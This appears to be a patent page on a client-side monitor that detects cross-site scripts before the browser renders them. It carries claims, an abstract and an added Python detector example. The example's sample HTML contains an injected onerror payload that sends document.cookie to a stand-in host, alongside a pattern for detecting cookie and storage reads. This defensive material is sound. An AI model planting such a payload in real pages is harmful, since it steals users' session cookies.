Cross-site script detection and prevention
First Claim
1. A method of detecting a cross-site script in Web content, the method comprising:
receiving, in a monitor of a client computer, a message from a browser for retrieving the Web content, the browser executing on said client computer having sensitive information, wherein the monitor is a separate component from the browser and is not a plug-in to the browser;
retrieving the Web content from a target Web server;
storing said Web content by said monitor in said client computer;
analyzing the Web content for a cross-site script by said monitor;
if a cross-site script is present in said Web content, determining a destination to which some or all of the sensitive information will be sent if the cross-site script executes, said determining performed by said monitor; and
displaying a message in the browser relating to display of the Web content, thereby preventing execution of the cross-site script in the browser, and wherein the storing step, analyzing step and the determining step are performed at the monitor and not at the browser, before the Web content is received by the browser.
Abstract
A cross-site scripting (XSS) attack injects Web content with malicious executable code that runs on an end user device when a browser on that device renders the content. To counter this, a behavior monitor operates as a gatekeeper for the browser. The monitor receives a message from the browser requesting Web content; the browser executes on a computing device that holds sensitive information. The monitor retrieves the Web content from the target Web server and analyzes it for XSS. If XSS is found, the monitor determines the destination to which some or all of the sensitive information would be sent if the XSS executed. A message is then displayed in the browser indicating whether the requested Web content should be viewed. In this manner, execution of the XSS in the browser is prevented. The analyzing and determining steps are performed before the Web content reaches the browser.
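The gatekeeper flow described in the abstract and in claims 1 and 12 (fetch on the browser's behalf, analyze, determine the destination of any leaked data, validate that destination, then hand the browser a verdict message instead of the raw content) is illustrated below with a small monitor written in Python. This is an added example, not code from the patent or its assignee. It assumes the caller has already retrieved the content (a constructed HTML page is embedded inline), models "sensitive information" as client-side reads of cookies, Web Storage and form data, and treats a destination as valid when its host matches the page's own host or appears in a caller-supplied list of trusted hosts; the pattern lists and the sample page are constructed for the example.

```python
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Script-text patterns that read sensitive client-side data (constructed list for this example).
SENSITIVE_READ = re.compile(r"document\.cookie|localStorage|sessionStorage|document\.forms", re.I)
# Absolute URLs appearing in script text: candidate destinations for the URL determination step.
URL_IN_SCRIPT = re.compile(r'''https?://[^\s'"<>()]+''', re.I)


@dataclass
class Finding:
    kind: str                  # "inline" (script body or on* handler) or "external" (script src)
    destination: str           # where data would be sent (URL determination)
    reads_sensitive: bool      # script reads cookies / storage / forms
    destination_allowed: bool  # destination passed URL validation


class ScriptCollector(HTMLParser):
    """Collects <script> bodies, on* event-handler attributes and external script src values."""

    def __init__(self):
        super().__init__()
        self.inline = []    # complete script bodies and handler attribute values
        self.external = []  # src attributes of external scripts
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            if attrs.get("src"):
                self.external.append(attrs["src"])
            else:
                self._in_script = True
        for name, value in attrs.items():
            if name.startswith("on") and value:
                self.inline.append(value)

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)  # buffer so a body split across chunks is analysed whole

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._buf = []
            self._in_script = False


def validate_destination(url, page_url, trusted_hosts=()):
    """URL validation: allowed when the host is the page's own host or an explicitly trusted host."""
    host = (urlparse(urljoin(page_url, url)).hostname or "").lower()
    page_host = (urlparse(page_url).hostname or "").lower()
    return host == page_host or host in {h.lower() for h in trusted_hosts}


def analyze_content(page_url, html, trusted_hosts=()):
    """Analysis step: one Finding per (script, destination) pair found in the content."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for text in collector.inline:
        reads = bool(SENSITIVE_READ.search(text))
        for url in URL_IN_SCRIPT.findall(text):
            findings.append(Finding("inline", url, reads, validate_destination(url, page_url, trusted_hosts)))
    for src in collector.external:
        findings.append(Finding("external", src, False, validate_destination(src, page_url, trusted_hosts)))
    return findings


def suspicious(findings):
    """A finding counts as XSS exfiltration when sensitive data is read and the destination is not validated."""
    return [f for f in findings if f.reads_sensitive and not f.destination_allowed]


def monitor_message(page_url, html, trusted_hosts=()):
    """The message the monitor hands to the browser in place of the raw content."""
    bad = suspicious(analyze_content(page_url, html, trusted_hosts))
    if not bad:
        return "OK: no cross-site script sending sensitive data was found; content may be displayed."
    destinations = ", ".join(sorted({f.destination for f in bad}))
    return f"BLOCKED: the page contains script that reads sensitive data and would send it to {destinations}. Display withheld."


# Constructed sample page: one benign same-host script, one external same-host script,
# and one injected handler that posts the cookie to an unrelated host.
SAMPLE_PAGE_URL = "https://shop.example/account"
SAMPLE_HTML = """<html><body>
<h1>Account</h1>
<script src="https://shop.example/static/app.js"></script>
<img src="x" onerror="new Image().src='https://collector.example.net/c?d='+document.cookie">
<script>
  // same-host metrics call: reads the cookie but stays on the page's own host
  fetch('https://shop.example/metrics', {method: 'POST', body: document.cookie});
</script>
</body></html>"""

if __name__ == "__main__":
    for f in analyze_content(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f)
    print(monitor_message(SAMPLE_PAGE_URL, SAMPLE_HTML))
```

Running the block prints three findings and a BLOCKED verdict naming the one destination that failed validation; passing `trusted_hosts=("collector.example.net",)` turns the verdict into OK, which is where the claimed URL validation component decides the outcome. The check is deliberately conservative in one direction only: a script that reads sensitive data but names no absolute URL produces no finding, so a production monitor would need to add relative-URL and DOM-constructed destinations.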
78 Citations
24 Claims
1. A method of detecting a cross-site script in Web content (independent claim; full text given under First Claim above). Dependent claims: 2 to 11.

12. A client device comprising:
a processor; a network interface; and a memory for storing a cross-site script detection monitor having a browser interface coupled to an independent browser; a Web interface; and a Web content analysis module including a URL determination component and a URL validation component; wherein the cross-site script detection monitor is separate from the browser and is not a plug-in to the browser; and a Web content storage area for storing Web content from a Web site, wherein the cross-site detection monitor detects a malicious cross-site script in said Web content that enables transmission of sensitive data relating to the client device to an unauthorized Web site. Dependent claims: 13 to 19.

20. A tangible and non-transitory computer-readable medium comprising computer code for detecting a cross-site script, said computer code of said computer-readable medium effecting the following:
receiving, in a monitor of a client computer, a message from a browser for retrieving the Web content, the browser executing on said client computer having sensitive information, wherein the monitor is a separate component from the browser and is not a plug-in to the browser; retrieving the Web content from a target Web server; storing said Web content by said monitor in said client computer; analyzing the Web content for a cross-site script by said monitor; if a cross-site script is present in said Web content, determining a destination to which some or all of the sensitive information will be sent if the cross-site script executes, said determining performed by said monitor; and displaying a message in the browser relating to display of the Web content, thereby preventing execution of the cross-site script in the browser if desired by a user, and wherein the storing step, analyzing step and the determining step are performed at the monitor and not at the browser, before the Web content is received by the browser. Dependent claims: 21 to 24.
Specification